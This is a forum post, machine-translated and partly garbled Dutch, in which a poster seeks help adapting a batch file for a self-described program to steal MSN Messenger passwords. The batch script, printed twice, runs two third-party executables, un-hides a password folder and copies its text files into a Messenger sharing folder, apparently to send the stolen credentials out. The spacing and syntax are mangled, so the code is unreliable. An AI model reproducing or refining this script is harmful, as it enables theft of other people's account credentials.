L
lykoulos
Guest
hi mensen, ik onlangs een "programma" om de wachtwoorden van mensen stelen van MSN Messenger.het enige probleem dat ik heb is dat ik dont zijn enige kennis van programmeren.Ik gebruikte de exe van iemand anders, en ik maakte een aantal partijen om het te draaien.Mijn exacte probleem is dit: ik heb een "bat" bestand, is er een manier om een soort van vorm te maken, zodat als ik typ iets in de vorm, zal de bat-bestand te krijgen veranderd, niet alle, maar slechts een deel van de binnenkant code.sorry voor mijn slechte Engels, dit is wat ik bedoel: mijn vleermuis is dit:
----------------------------
start UFOs.exe
Start ufo.exe
@ ping 127.0.0.1-n 4-w 10000> nul
attrib-h PAS
attrib-h PAS \ ***** 1 *****. txt
xcopy *. txt "C: \ Documents and Settings \% gebruikersnaam% \ Local Settings \ Application Data \ Microsoft \ Messenger \ ***** 2 ***** \ Sharing Folders \ ***** 3 *** ** "/ s / q / c / h
exit
-----------------------------
Is er een manier om een vorm die de ***** 1 *****, ***** 2 verandert ***** en ***** 3 ***** in de vleermuis en maken slaat de vleermuis?
ik heb geüpload het bat bestand met dit bericht, het is in de b.rar
----------------------------
start UFOs.exe
Start ufo.exe
@ ping 127.0.0.1-n 4-w 10000> nul
attrib-h PAS
attrib-h PAS \ ***** 1 *****. txt
xcopy *. txt "C: \ Documents and Settings \% gebruikersnaam% \ Local Settings \ Application Data \ Microsoft \ Messenger \ ***** 2 ***** \ Sharing Folders \ ***** 3 *** ** "/ s / q / c / h
exit
-----------------------------
Is er een manier om een vorm die de ***** 1 *****, ***** 2 verandert ***** en ***** 3 ***** in de vleermuis en maken slaat de vleermuis?
ik heb geüpload het bat bestand met dit bericht, het is in de b.rar